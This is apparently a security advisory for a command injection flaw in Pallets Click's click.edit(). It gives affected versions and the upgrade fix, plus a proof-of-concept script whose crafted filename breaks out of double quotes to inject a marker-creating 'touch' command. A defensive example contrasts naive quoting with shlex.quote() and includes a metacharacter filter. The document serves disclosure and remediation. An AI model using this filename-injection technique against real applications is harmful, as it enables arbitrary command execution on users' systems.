# Pallets Click Command Injection Vulnerability Summary

## Vulnerability Overview

The `click.edit()` function in the Pallets Click library contains a command injection vulnerability. When invoking the system editor, the function does not adequately sanitize the incoming `filename` parameter: it only wraps the value in double quotes before handing it to the shell. An attacker who controls the filename can therefore include double quote characters to break out of the quoted argument and inject arbitrary operating system commands, which are then executed with the privileges of the calling process.

## Affected Scope

- **Affected Product**: Pallets Click
- **Affected Versions**: All versions prior to 8.3.3
- **Fixed Version**: 8.3.3
- **Severity**: High (7.3 / 10)
- **Vulnerability Type**: CWE-78 (OS Command Injection)

## Remediation

Upgrade the Click library to version **8.3.3** or later.

## Proof of Concept (POC)

```python
#!/usr/bin/env python3
import os
import subprocess

import click


def main():
    marker_file = "click_pwned_marker"
    # The double quote closes the argument that click.edit() built around the
    # filename; everything after it is parsed by the shell as further commands.
    malicious_filename = f'clickpoc"; touch {marker_file}; echo "'
    print(f"[*] Malicious filename: {malicious_filename}")

    # The file must exist on disk for click.edit() to open it.
    try:
        subprocess.run(["touch", malicious_filename], check=True)
        print(f"[+] File exists: {os.path.exists(malicious_filename)}")
    except Exception as e:
        print(f"[-] Failed to create file: {e}")
        return

    # 'true' is used as the editor so the PoC does not block on an interactive program.
    try:
        result = click.edit(filename=malicious_filename, editor='true')
        print(f"[*] click.edit() returned: {result}")
    except Exception as e:
        print(f"[*] Exception: {e}")
    finally:
        if os.path.exists(malicious_filename):
            os.remove(malicious_filename)

    if os.path.exists(marker_file):
        print(f"[+] SUCCESS: marker file '{marker_file}' was created by the injected command.")
    else:
        print("[-] Marker file NOT created.")


if __name__ == "__main__":
    main()
```
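To see why wrapping in double quotes is not a shell-safe quoting strategy, the added example below (not Click's own source; the two command builders are simplified stand-ins for how an editor command line gets assembled) tokenises the resulting command the way a POSIX shell would, without executing anything, and contrasts it with `shlex.quote()`. It also includes a conservative filename pre-check a caller can apply while still on an unfixed version.

```python
#!/usr/bin/env python3
"""Compare the weak quoting pattern described above with a hardened one by
tokenising the command line as a POSIX shell would, without running it.
The command builders are simplified stand-ins, not Click's own code."""
import shlex
from typing import List

EDITOR = "true"  # editor name, as in the PoC above

# Constructed sample input mirroring the PoC's filename.
MALICIOUS = 'clickpoc"; touch click_pwned_marker; echo "'


def naive_command(filename: str) -> str:
    """Weak pattern: wrap the filename in double quotes only."""
    return f'{EDITOR} "{filename}"'


def hardened_command(filename: str) -> str:
    """shlex.quote() single-quotes the value and escapes embedded single
    quotes, so the shell always sees it as exactly one argument."""
    return f"{EDITOR} {shlex.quote(filename)}"


def shell_words(cmd: str) -> List[str]:
    """Split cmd into words and operators as a POSIX shell would (';' and
    friends become their own tokens), without running the command."""
    lexer = shlex.shlex(cmd, posix=True, punctuation_chars=True)
    lexer.whitespace_split = True
    return list(lexer)


def is_single_argument(cmd: str) -> bool:
    """True only if the shell would see 'EDITOR <one argument>' and nothing else."""
    words = shell_words(cmd)
    return len(words) == 2 and words[0] == EDITOR


SHELL_META = set("\"'`$;&|<>()\\\n")


def is_safe_filename(filename: str) -> bool:
    """Conservative pre-check for callers stuck on an unfixed version: reject
    names carrying shell metacharacters before they reach click.edit()."""
    return not (SHELL_META & set(filename))


if __name__ == "__main__":
    for build in (naive_command, hardened_command):
        cmd = build(MALICIOUS)
        print(f"{build.__name__}: {cmd!r}")
        print(f"  shell sees {shell_words(cmd)}")
        print(f"  single argument? {is_single_argument(cmd)}")
    print(f"is_safe_filename: {is_safe_filename(MALICIOUS)}")
```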